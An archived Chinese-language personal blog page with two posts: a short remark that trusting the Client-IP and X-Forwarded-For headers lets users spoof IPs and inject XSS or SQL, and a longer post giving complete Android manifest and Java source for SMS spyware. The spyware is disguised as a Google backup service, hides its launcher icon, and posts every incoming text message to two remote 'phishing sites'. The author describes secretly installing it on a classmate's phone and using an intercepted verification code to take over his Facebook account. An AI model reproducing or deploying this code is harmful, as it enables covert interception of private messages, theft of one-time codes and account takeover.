Weil Jimmer's BlogWeil Jimmer's Blog


Month:November 2015

Found 2 records. At Page 1 / 1.

程式設計缺陷足以修改Header偽造IP

No Comments
-
更新於 2017-05-19 18:59:14

這其實是個老梗,很久以前就知道了。今天又突然想到,發篇文章好了。

很多網站上的程式教學都是錯誤的,取得IP方法用get Header 的 Client-IP 及 X-Forwarded-For

真的是禍害,Header是可以給用戶隨意變更的。

我修改了 Header 在網站上隨意搜尋 What is my ip ?。

結果大部分網站都有問題!

我怎麼改,網站就怎麼顯示,怎麼都對。如果今天我把Header改成<script>標籤,不就造成了XSS攻擊漏洞?改成SQL語法,造成SQL注入漏洞。

只是剛好想到,之前也沒發過類似的文章,補發。


This entry was posted in General, Experience, HTML, The Internet, PHP By Weil Jimmer.

Android Java SMS Spy

No Comments
-
更新於 2018-03-28 12:23:37

====2015/11/20====

這是我很久以前寫的秘密程式,我當下就很想發表,我有很多都很想發表到我網站,但因網站主機是臨時的,將來還要再次轉移,故我就荒廢了網站整整兩個月(我是指不發文,並非我不管理),現在轉移完畢,意味著我將會再次發文。

================

※純測試,不做非法用途。

首先,因為這程式很兩極化,既可以合法也可以非法,講好聽點就是自動同步SMS訊息到網站上,講難聽點,竊取用戶SMS訊息。

腦筋轉得不夠快的人可能不明白這意味著什麼,只要裝了我寫的程式,就會被我盜光所有帳號。

開發緣由:因為我同學不相信「手機防毒軟體掃描不出病毒」,所以我向他放話,我寫的程式,防毒絕對掃不到。

因為我避免用戶發現這個祕密程式,所以我取名為google_sms_server。到時候要查就很困難。

<application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme" >
        <activity android:name=".MainActivity" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".SmsCloudBackup"
            android:enabled="true"
            android:exported="true" >
            <intent-filter android:priority="999999999" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

    </application>

設置 SMS_RECEIVED廣播,備註要記得添加權限,並把優先級別設定為最高級別。

package com.google.google_sms_server;

import android.app.Activity;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        //setContentView(R.layout.activity_main);
        PackageManager p = getPackageManager();
        p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);//設定隱藏在Launcher中

        Toast.makeText(this,"Google SMS Backup Service運作中",Toast.LENGTH_LONG).show();
        this.finish();
    }

}
package com.google.google_sms_server;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;

import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;

import java.util.ArrayList;
import java.util.List;

public class SmsCloudBackup extends BroadcastReceiver {

    private String TAG = SmsCloudBackup.class.getSimpleName();
    public SmsCloudBackup() {

    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Get the data (SMS data) bound to intent
        Bundle bundle = intent.getExtras();
        String str = "";
        SmsMessage[] msgs = null;

        if (bundle != null) {
            Object[] pdus = (Object[]) bundle.get("pdus");
            msgs = new SmsMessage[pdus.length];

            for (int i=0; i < msgs.length; i++) {
                msgs[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);
                str += "SMS from " + msgs[i].getOriginatingAddress() + " : ";
                str += msgs[i].getMessageBody().toString();
                str += "\n";
            }

            if (str.contains("驗證") || str.toLowerCase().contains("verif")){
                Log.d(TAG, "ABORT");
                this.abortBroadcast();//截斷用戶訊息,讓用戶察覺不到驗證訊息。實際上測試,似乎沒有效果。
            }

            Log.d(TAG, str);
            String aa= "";
            try{
                aa=java.net.URLEncoder.encode(str,"utf-8");
            }catch (Exception ex){

            }
            new ExcuteAsyncTaskOperation().execute(aa);

        }

    }

    public class ExcuteAsyncTaskOperation extends AsyncTask<String, String, String> {
        //異線任務,執行網路動作都要這樣。
        @Override
        protected String doInBackground(String... parr) {
            //進行背景工作,如「Network」,並可轉發值。
            //在迴圈中使用publishProgress((onProgressUpdate引數類別)變數);以傳遞資料。
            //例如publishProgress((int)50);

            HttpClient httpclient = new DefaultHttpClient();
            //我POST訊息至兩個釣魚網站。
            HttpPost httppost = new HttpPost("http://網站/post/post.php?u=SMS&c=" + parr[0]);
            HttpPost httppost2 = new HttpPost("http://網站2/post/post.php?u=SMS&c=" + parr[0]);
            try {
                List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(1);
                nameValuePairs.add(new BasicNameValuePair("u", "SMS"));
                nameValuePairs.add(new BasicNameValuePair("c", parr[0]));
                httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
                httpclient.execute(httppost);
                httpclient.execute(httppost2);
            } catch (Exception ex) {
                Log.d(TAG, "ERROR!!!!!!!!!!!!!!!!!!!!!" + ex.toString());
            }
            return "";
        }

    }

}

這樣,當用戶安裝完成,並執行後,此程式會從Launcher上消失,意思是找不到此程式的連結,並且會關閉此程式,得去 設定=>應用程式 才可能看到,但我已經取名為google什麼的,用戶很難察覺。

實作結果:

我祕密的裝在同學手機上,在他未察覺的情況下,進行這測試。事後他非常不爽,不過最後他還是原諒我了。

從釣魚網站,取得FB驗證碼。成功盜走FB帳號。


This entry was posted in Android, General, Java, The Internet, Note By Weil Jimmer.

 1 /1 頁)

Visitor Count

pop
nonenonenone

Note

台灣假新聞橫行,沒一家霉體能信的,網軍側翼到處洗風向,堪憂。

毋忘初心,
絕不利慾薰心。

支持網路中立性.
Support Net Neutrality.

飽暖思淫欲,
饑寒起盜心。

支持臺灣實施無條件基本收入

歡迎前來本站。

Words Quiz


Search

Music

Blogging Journey

4465days

since our first blog post.

The strong do what they can and the weak suffer what they must.

Privacy is your right and ability to be yourself and express yourself without the fear that someone is looking over your shoulder and that you might be punished for being yourself, whatever that may be.

It is quality rather than quantity that matters.

I WANT Internet Freedom.

Reality made most of people lost their childishness.

Justice,Freedom,Knowledge.

Without music life would be a mistake.

Support/Donate

This site also need a little money to maintain operations, not entirely without any cost in the Internet. Your donations will be the best support and power of the site.
MethodBitcoin Address
bitcoin1gtuwCjjVVrNUHPGvW6nsuWGxSwygUv4x
buymeacoffee
Register in linode via invitation link and stay active for three months.Linode

Support The Zeitgeist Movement

The Zeitgeist Movement

The Lie We Live

The Lie We Live

The Questions We Never Ask

The Questions We Never Ask

Man

Man

THE EMPLOYMENT

Man

In The Fall

In The Fall

Facebook is EATING the Internet

Facebook

Categories

Android (7)

Announcement (4)

Arduino (2)

Bash (2)

C (3)

C# (5)

C++ (1)

Experience (52)

Flash (2)

Free (13)

Functions (36)

Games (13)

General (60)

Git (2)

HTML (7)

Java (13)

JS (7)

Mood (24)

NAS (2)

Note (32)

Office (1)

OpenWrt (6)

PHP (9)

Privacy (4)

Product (12)

Python (4)

Software (11)

The Internet (25)

Tools (16)

VB.NET (8)

WebHosting (7)

Wi-Fi (5)

XML (4)